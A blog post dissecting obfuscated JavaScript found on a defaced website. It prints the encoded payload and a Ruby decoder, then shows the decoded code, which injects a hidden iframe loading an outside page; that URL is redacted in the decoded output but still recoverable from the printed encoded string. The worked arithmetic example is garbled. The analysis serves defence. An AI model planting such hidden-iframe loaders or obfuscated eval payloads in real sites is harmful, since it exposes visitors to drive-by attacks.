The Hacked Site


After the publication of the Plex Exploit, a friend of mine, got de-faced on one of his old sites.

I asked him of he could send the JavaScript which made his site look funny and so he did.

 

 

the code:

n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54 a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47 .5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3. 5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15

a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16

a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5

a51a51.5a56.5a57a54.5a56a57.5a54.5a50a57a51a54.5a58.5a49.5a56a56.5a22a48.5a54.5a

53.5a22.5a53.5a47.5a51.5a54a22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a25a48.5a27a49

a48.5a24.5a25a27a26a26a25.5a26.5a23a24.5a23.5a48.5a18.5a15a58.5a51.5a49a57a51a29.5

a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57

a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a 49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53

a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29

a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54

a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a

58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a

47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5

a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56

a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a51a51.5a56.5a57a54.5a56a57.5a54.5a50

a57a51a54.5a58.5a49.5a56a56.5a22a48.5a54.5a53.5a22.5a53.5a47.5a51.5a54a22a55a51a

55a30.5a55a47.5a50.5a49.5a29.5a25a48.5a27a49a48.5a24.5a25a27a26a26a25.5a26.5a23

a24.5a23.5a48.5a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48

a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a

53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a

49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50

a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57

a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5

a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5

a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5

a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a

59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5

a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");

for(i=0;0>-n.length+i;i++)

{j=i;ss=ss+s[f](-h*(1+1*n[j]));}

if(1)q=ss;if(f)e(q);</script>

Attackers like to obfuscate their intentions by mangling the code they like execute. This time, they used some mathematics to trick the browser and input checker(s) for mallicious code. Therefore I started to disect the code.

First of all, don’t execute this code in your browser!

The interesting part is to look at the definition of n. this is a long string wich embodies the code wich they like to execute.

When looking at the end of N, we see that they craft an array of floats (broken numbers), which are separated by the ‘a’ character.

than they map the function ss = ss + s[f](-h*(1+1*n[j]))) on each element n.

however h is defined as: h= -2 * math.Log(Math.e);

for those that don’t know math. log(E) = 1, so h is -2.

back to the function. what they in essence do is for each numer in n,

multiply by 1
add +1 to this number
multiply by -h
so, to recap, if the input is 35.5

((25.5)*1)+1)*–2) = 52.

after that, they rebuild the string using a function to recover the ASCII representation of the number calculated, building the code to execute

if(1)

q=ss

They conclude their work with copying the string, and evaluating the string. This tells javascript to execute the code inside the string.

I wrote this (Ruby 1.9) code to decode the string:

input = "3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a..... the complete String is listed above"

h = -2

arr = input.split("a")

text = ""

arr.each{|i|

c = -h * (1 + (1* Float(i)))

int = Integer(c)

char = [int].pack("C*")

text = text + char

}

puts text

the resulting output is the following, please note that I’ve removed the urls to be sure:

if (document.getElementsByTagName('body')[0]){

iframer();

} else {

document.write("
<iframe style="visibility: hidden; position: absolute; left: 0; top: 0;" src="SCARY_URL" width="10" height="10">
");

} function iframer(){

var f = document.createElement('iframe');

f.setAttribute('src','SCARY_URL');

f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';

f.setAttribute('width','10');

f.setAttribute('height','10');

document.getElementsByTagName('body')[0].appendChild(f);

}